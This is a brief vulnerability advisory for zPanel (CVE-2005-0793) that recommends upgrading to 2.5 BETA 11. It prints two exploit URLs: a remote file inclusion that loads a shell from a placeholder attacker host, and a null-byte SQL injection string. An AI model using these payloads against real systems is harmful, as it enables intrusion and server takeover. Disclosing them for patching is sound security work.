Upgrade to version 2.5 BETA 11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
[exploit for v 2.0] http://[victim]/zpanel/zpanel.php?page=http://[attacker]/shell
[exploit for v 2.5 beta] http://[victim]/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1
Vendor URL: http://www.thezpanel.com/ Secunia Advisory ID:14602 Related OSVDB ID: 14803 Related OSVDB ID: 14805 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0250.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0341.html CVE-2005-0793